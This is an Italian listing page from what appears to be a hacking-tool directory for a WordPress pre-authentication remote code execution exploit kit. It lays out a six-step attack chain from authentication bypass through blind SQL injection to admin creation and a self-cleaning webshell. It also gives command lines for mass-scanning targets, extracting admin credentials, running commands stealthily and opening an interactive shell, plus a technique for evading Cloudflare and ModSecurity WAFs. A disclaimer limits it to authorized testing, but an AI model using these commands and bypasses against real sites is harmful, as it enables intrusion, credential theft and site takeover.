Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/m4xsec/wp2shell-exploit-waf-bypass
Scanner di Vulnerabilità WebExploitSfruttamento di Applicazioni WebTest di Sicurezza delle APIBypass WAFPenetration TestingRed Teaming
GitHubm4xsec/wp2shell-exploit-waf-bypass

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

wp2shell-Exploit-Waf-Bypass

Exploit WordPress RCE Pre-Auth + Scanner + Bypass WAF | CVE-2026-63030 + CVE-2026-60137 | Go + Python + moduli Metasploit + lab Docker

Vedi Repository
211 giorni faNon ancora revisionato
root@kitploit:~
                ___      __         ___
 _      _____  |__ \ ___/ /_  ___  / / /
| | /| / / _ \ __/ // __/ __ \/ _ \/ / / 
| |/ |/ /  __// __//_  / / / /  __/ / /  
|__/|__/\___//____//__/_/ /_/\___/_/_/   
                                         
  WordPress Pre-Auth RCE — CVE-2026-63030 + CVE-2026-60137
  di Venexy (M4xSec)

GitHub Release License: MIT Go Metasploit

Esecuzione remota di codice senza autenticazione su WordPress 6.8.0–6.8.5, 6.9.0–6.9.4, 7.0.0–7.0.1. Corretto in 6.8.6, 6.9.5, 7.0.2.

Installazione rapida

root@kitploit:~
# Pre-compiled binary (fastest)
curl -sL https://github.com/M4xSec/wp2shell-Exploit-Waf-Bypass/releases/download/v1.0.0/wp2shell-linux-amd64 -o wp2shell && chmod +x wp2shell

# Or build from source
go build -o wp2shell go-scanner/wp2shell-master.go

Catena di attacco

  1. La confusione di routing tramite richieste batch annidate con percorso primer non valido bypassa l'autenticazione
  2. La SQLi blind basata sul tempo estrae il prefisso delle tabelle, l'ID admin e le credenziali
  3. La forgiatura di righe basata su UNION popola le cache oEmbed (SQLi di sola lettura → scritture DB)
  4. Elevazione del changeset + parse_request() rientrante crea un amministratore
  5. L'upload di un plugin distribuisce una webshell auto-pulente
  6. Esecuzione di comandi e pulizia automatica

Strumenti

Scanner Go (go-scanner/wp2shell-master.go)

Binario all-in-one — scan, check, read, exploit, shell interattiva.

root@kitploit:~
go build -o wp2shell-master go-scanner/wp2shell-master.go

# Mass scan
./wp2shell-master scan -f targets.txt -j -t 20

# Confirm SQLi
./wp2shell-master check https://target.com --waf --delay 3.0

# Extract admin creds
./wp2shell-master read https://target.com --preset users

# Pre-auth RCE (no password needed)
./wp2shell-master rce https://target.com --cmd id -y --waf --stealth

# Interactive shell
./wp2shell-master rce https://target.com -i -y

Strumenti di bypass WAF (waf-bypass/)

Script standalone per il bypass di Cloudflare/ModSecurity tramite escaping unicode JSON delle parole chiave SQL.

  • core.py — Motore SQLi blind condiviso con bypass WAF
  • dump_version.py — Estrae @@version
  • dump_dbname.py — Estrae DATABASE()
  • dump_tables.py — Enumera le tabelle
  • dump_columns.py — Enumera le colonne
  • rce_shell.py — Catena RCE completa con bypass WAF

Moduli Metasploit (metasploit-modules/)

  • wp2shell_rce.rb — Modulo exploit per RCE completa (PR #21760)
  • wp2shell_scanner.rb — Scanner non distruttivo (PR #21761)

Installa localmente:

root@kitploit:~
mkdir -p ~/.msf4/modules/exploits/multi/http
mkdir -p ~/.msf4/modules/auxiliary/scanner/http
cp metasploit-modules/wp2shell_rce.rb ~/.msf4/modules/exploits/multi/http/wp_wordpress_batch_rce.rb
cp metasploit-modules/wp2shell_scanner.rb ~/.msf4/modules/auxiliary/scanner/http/wp_wordpress_batch_sqli.rb

Tecnica di bypass WAF

Il WAF Cloudflare ispeziona i byte JSON grezzi, ma non decodifica le sequenze di escape \uXXXX prima del pattern matching. Il json_decode() PHP di WordPress le decodifica in modo trasparente.

  • SLEEP → SLEEP — bypassa il rilevamento delle parole chiave
  • Primer con i due punti (: invece di http://:) — più corto, evita le regole dei pattern URI
  • Percorso permalink /wp-json/batch/v1 — evita il blocco di ?rest_route=
  • Gli header Origin + Referer dal dominio di destinazione — soddisfa i controlli CORS/same-origin

Laboratorio Docker

Laboratorio senza WAF (porta 8888)

root@kitploit:~
cd lab
docker compose up -d --build
# WordPress 6.9.0 at http://localhost:8888
# Admin: admin / Summer2026!

Laboratorio WAF (porta 9999)

ModSecurity CRS (OWASP) con regole in stile Cloudflare — bypass unicode confermato.

root@kitploit:~
cd lab/waf
docker compose up -d --build
# WordPress behind WAF at http://localhost:9999

Dichiarazione di non responsabilità

Questo strumento è destinato esclusivamente a test di sicurezza autorizzati. Utilizzalo solo su sistemi di tua proprietà o per i quali disponi di un'esplicita autorizzazione scritta al test. L'accesso non autorizzato è illegale.

Licenza

MIT

root@kitploit:~
Scarica lo strumento